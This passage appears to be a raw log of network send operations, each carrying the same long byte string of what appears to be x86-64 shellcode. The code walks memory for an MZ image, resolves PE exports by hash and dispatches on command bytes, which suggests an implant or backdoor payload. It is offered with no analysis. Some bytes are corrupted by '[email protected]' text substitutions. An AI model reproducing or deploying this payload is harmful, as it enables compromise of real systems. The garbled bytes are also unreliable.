H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 17, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 18, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 19, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 